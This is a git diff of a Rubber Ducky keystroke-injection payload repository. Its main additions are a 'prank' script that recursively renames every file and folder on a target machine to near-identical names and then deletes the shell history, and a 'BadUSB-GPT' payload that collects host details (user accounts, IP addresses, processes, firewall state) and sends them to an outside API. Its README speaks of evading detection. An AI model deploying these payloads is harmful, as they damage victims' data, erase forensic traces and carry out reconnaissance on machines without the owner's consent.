![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
|
||||
|
||||
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
|
||||
|
||||
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
|
||||
|
||||
> What it looks like instead if you turn on the extension view.
|
||||
|
||||
# Index
|
||||
|
||||
1. [Features](#features)
|
||||
2. [Payload Structure](#payload-structure)
|
||||
- [Conditional Target OS Execution](#conditional-target-os-execution)
|
||||
- [PowerShell (Windows)](#powershell-windows)
|
||||
- [Bash (GNU/Linux)](#bash-gnulinux)
|
||||
3. [How to Use](#how-to-use)
|
||||
4. [Why not MacOS?](#why-not-macos)
|
||||
5. [Notes](#notes)
|
||||
6. [Credits](#credits)
|
||||
|
||||
|
||||
## Features
|
||||
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
|
||||
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
|
||||
|
||||
## Payload Structure
|
||||
|
||||
### Conditional Target OS Execution
|
||||
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
|
||||
- If the target system is **Windows**, the script will execute a PowerShell script.
|
||||
- If the target system is **Linux**, it will execute a Bash script.
|
||||
|
||||
### PowerShell (Windows)
|
||||
For **Windows** systems, the script:
|
||||
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
|
||||
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
|
||||
|
||||
### Bash (GNU/Linux)
|
||||
For **GNU/Linux** systems, the script:
|
||||
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
|
||||
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
|
||||
|
||||
## How to Use
|
||||
|
||||
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
|
||||
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
|
||||
|
||||
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
|
||||
|
||||
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||
|
||||
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
|
||||
|
||||
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
|
||||
|
||||
Of course, you have to make sure that this folder exists....
|
||||
|
||||
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
|
||||
|
||||
> How Windows response to the command `cd ./Desktop/Hello/World/`
|
||||
|
||||
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
|
||||
|
||||
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
|
||||
|
||||
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||
|
||||
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|
||||
|
||||
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||
|
||||
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|
||||
|
||||
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||
|
||||
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
|
||||
|
||||
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
|
||||
|
||||
## Why not MacOS?
|
||||
|
||||
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||
|
||||
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
|
||||
|
||||
## Notes
|
||||
- Ensure that the specified directories exist on the target machine.
|
||||
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
|
||||
- Contributions to add support for macOS are welcome.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,222 @@
|
|||
REM_BLOCK
|
||||
#############################################
|
||||
# #
|
||||
# Title : Same File Name Prank #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11; GNU/Linux #
|
||||
# #
|
||||
#############################################
|
||||
END_REM
|
||||
|
||||
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||
|
||||
REM %%%%% DEFINE-SECTION %%%%%
|
||||
REM_BLOCK
|
||||
|
||||
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
|
||||
|
||||
Of course, you have to make sure that this folder exists....
|
||||
|
||||
Payload Settings:
|
||||
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
|
||||
|
||||
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||
- Limit on file name length in bash [closed]
|
||||
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|
||||
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||
|
||||
END_REM
|
||||
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
|
||||
|
||||
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
|
||||
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
|
||||
DEFINE #TARGET_WINDOWS TRUE
|
||||
DEFINE #TARGET_GNU_LINUX FALSE
|
||||
|
||||
REM %%%%% PAYLOAD-SECTION %%%%%
|
||||
|
||||
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
|
||||
REM %%%%% WINDOWS CODE %%%%%
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||
|
||||
function Rename-Directories {
|
||||
param (
|
||||
[string]$path,
|
||||
[ref]$counter
|
||||
)
|
||||
|
||||
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
|
||||
foreach ($folder in $folders) {
|
||||
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
|
||||
$newFolderPath = $newFolderName
|
||||
|
||||
$counter.Value++
|
||||
|
||||
Rename-Item -Path $folder.FullName -NewName $newFolderPath
|
||||
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
|
||||
}
|
||||
}
|
||||
|
||||
function Rename-Files {
|
||||
param (
|
||||
[string]$path,
|
||||
[ref]$counter
|
||||
)
|
||||
$files = Get-ChildItem -Path $path -File -Recurse
|
||||
foreach ($file in $files) {
|
||||
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
|
||||
$newFilePath = "$newFileName" + $file.Extension
|
||||
|
||||
$counter.Value++
|
||||
|
||||
Rename-Item -Path $file.FullName -NewName $newFilePath
|
||||
}
|
||||
}
|
||||
|
||||
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
END_STRINGLN
|
||||
|
||||
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
|
||||
REM %%%%% GNU/LINUX CODE %%%%%
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BASH
|
||||
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||
|
||||
rename_directories() {
|
||||
local path=$1
|
||||
local counter=$2
|
||||
|
||||
directories=$(find "$path" -type d | sort -r)
|
||||
|
||||
for dir in $directories; do
|
||||
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
|
||||
new_folder_path="$path/$new_folder_name"
|
||||
|
||||
counter=$((counter + 1))
|
||||
|
||||
mv "$dir" "$new_folder_path"
|
||||
done
|
||||
}
|
||||
|
||||
rename_files() {
|
||||
local path=$1
|
||||
local counter=$2
|
||||
|
||||
files=$(find "$path" -type f)
|
||||
|
||||
for file in $files; do
|
||||
extension="${file##*.}"
|
||||
|
||||
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
|
||||
|
||||
new_file_path="$(dirname "$file")/$new_file_name"
|
||||
|
||||
if [[ "$extension" != "$file" ]]; then
|
||||
new_file_path="$new_file_path.$extension"
|
||||
fi
|
||||
|
||||
counter=$((counter + 1))
|
||||
|
||||
mv "$file" "$new_file_path"
|
||||
done
|
||||
}
|
||||
|
||||
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
|
||||
END_STRINGLN
|
||||
END_IF
|
|
@ -22,3 +22,25 @@ Open a PowerShell, stop Teams if is runned, run Teams, run new message function,
|
|||
### Settings
|
||||
|
||||
- Setup the receiver
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -1,4 +1,4 @@
|
|||
# Send Telegram Messages - Linux ✅
|
||||
# Send Telegram Messages - Linux
|
||||
|
||||
A script used to prank your friends sending messages by using Telegram app.
|
||||
|
||||
|
@ -17,11 +17,29 @@ Opens a shell, runs the telegram-desktop app, search the user by the id, enter i
|
|||
* Internet Connection
|
||||
* telegram-desktop installed and activated
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Telegram username
|
||||
- Messages
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
|
|||
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
|
||||
REM Author: UberGuidoZ
|
||||
REM Target: Windows (including Powershell 2.0 or above)
|
||||
|
||||
REM Version: v1.1
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 3000
|
||||
GUI r
|
||||
DELAY 750
|
||||
|
|
|
@ -19,3 +19,25 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t
|
|||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,128 @@
|
|||
REM Author: ooovenenoso
|
||||
REM Open PowerShell
|
||||
DELAY 500
|
||||
GUI x
|
||||
DELAY 2000
|
||||
STRING a
|
||||
DELAY 2000
|
||||
LEFTARROW
|
||||
DELAY 2000
|
||||
ENTER
|
||||
REM Create PowerShell script to gather system information
|
||||
DELAY 500
|
||||
STRING $system_info = @{
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'OS' = $(Get-CimInstance Win32_OperatingSystem).Caption;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'Version' = $(Get-CimInstance Win32_OperatingSystem).Version;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'Architecture' = $(Get-CimInstance Win32_OperatingSystem).OSArchitecture;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'ComputerName' = $(Get-CimInstance Win32_OperatingSystem).CSName;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'LastBootTime' = $(Get-CimInstance Win32_OperatingSystem).LastBootUpTime;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'InstalledUpdates' = $(Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object -First 5).Description;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'NetworkInfo' = $(Get-CimInstance Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled -eq $true}).IPAddress;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'FirewallStatus' = $(Get-NetFirewallProfile | Where-Object { $_.Enabled -eq $true }).Name;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'UserAccounts' = $(Get-LocalUser | Where-Object { $_.Enabled -eq $true }).Name;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING 'RunningProcesses' = $(Get-Process | Sort-Object -Property CPU -Descending | Select-Object -First 5).Name;
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING }
|
||||
ENTER
|
||||
|
||||
REM Requesting GPT to format response in HTML
|
||||
DELAY 500
|
||||
STRING $prompt_text = "Given the detailed system information: OS: $($system_info.OS), Version: $($system_info.Version), Architecture: $($system_info.Architecture), Computer Name: COMPUTER_NAME_PLACEHOLDER, Last Boot Time: $($system_info.LastBootTime), Installed Updates: $($system_info.InstalledUpdates), Network Info: NETWORK_INFO_PLACEHOLDER, Firewall Status: $($system_info.FirewallStatus), User Accounts: USER_ACCOUNTS_PLACEHOLDER, Running Processes: $($system_info.RunningProcesses), provide a pentesting report identifying potential vulnerabilities in English, formatted in HTML with headers and bullet points for recommendations."
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $messages = @(
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING @{ 'role' = 'system'; 'content' = 'You are analyzing detailed system information for potential vulnerabilities.' },
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING @{ 'role' = 'user'; 'content' = $prompt_text }
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING )
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $headers = @{ 'Authorization' = 'Bearer YOUR_OPENAI_API_KEY'; 'Content-Type' = 'application/json' }
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $response = Invoke-RestMethod -Uri 'https://api.openai.com/v1/chat/completions' -Method POST -Headers $headers -Body (@{ model = 'gpt-3.5-turbo'; messages = $messages } | ConvertTo-Json)
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $htmlContent = @"
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <html>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <head>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <title>Pentesting Report BadUSB-GPT</title>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <style>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING body {font-family: Arial, sans-serif; margin: 40px;}
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING h2 {color: #333; border-bottom: 2px solid #eee; padding-bottom: 10px;}
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING h3 {color: #555; margin-top: 20px;}
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING p, ul {margin-bottom: 20px;}
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING </style>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING </head>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <body>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING <h2>Pentesting Report</h2>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $($response.choices[0].message.content)
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING </body>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING </html>
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING "@
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-Content -Path $env:USERPROFILE\Desktop\Pentesting_Report.html -Value $htmlContent
|
||||
ENTER
|
||||
REM Replacing placeholders with actual values in the local report
|
||||
DELAY 500
|
||||
STRING (Get-Content $env:USERPROFILE\Desktop\Pentesting_Report.html).Replace('COMPUTER_NAME_PLACEHOLDER', $system_info.ComputerName).Replace('NETWORK_INFO_PLACEHOLDER', ($system_info.NetworkInfo -join ', ')).Replace('USER_ACCOUNTS_PLACEHOLDER', ($system_info.UserAccounts -join ', ')) | Set-Content $env:USERPROFILE\Desktop\Pentesting_Report.html
|
||||
ENTER
|
|
@ -0,0 +1,24 @@
|
|||
# Rubber Ducky Meets OpenAI's GPT
|
||||
|
||||
![BadUSB x GPT](https://github.com/ooovenenoso/BadUSB-GPT/blob/main/banner.png)
|
||||
|
||||
## Description
|
||||
This script automates the gathering of detailed system information and uses the OpenAI GPT-3.5 Turbo API to generate a pentesting report based on the collected information. Additionally, the script showcases an example of obfuscation to protect sensitive parts of the code and to evade basic detection mechanisms.
|
||||
|
||||
## Features
|
||||
- Gathers system information, including OS, version, architecture, computer name, last boot time, installed updates, network info, firewall status, user accounts, and running processes.
|
||||
- Formats the collected information into a request for GPT-3.5 Turbo.
|
||||
- Generates a pentesting report in HTML based on the response from GPT-3.5 Turbo.
|
||||
- Demonstrates basic code obfuscation techniques.
|
||||
- Saves the report on the user's desktop.
|
||||
|
||||
## Usage
|
||||
1. Ensure you have PowerShell and access to the OpenAI API.
|
||||
2. Run the script.
|
||||
3. Check the generated report on the user's desktop.
|
||||
|
||||
## Disclaimer
|
||||
This script is intended for educational and demonstration purposes only. Do not use it on live systems without proper permission.
|
||||
|
||||
## Author
|
||||
- ooovenenoso
|
Loading…
Reference in New Issue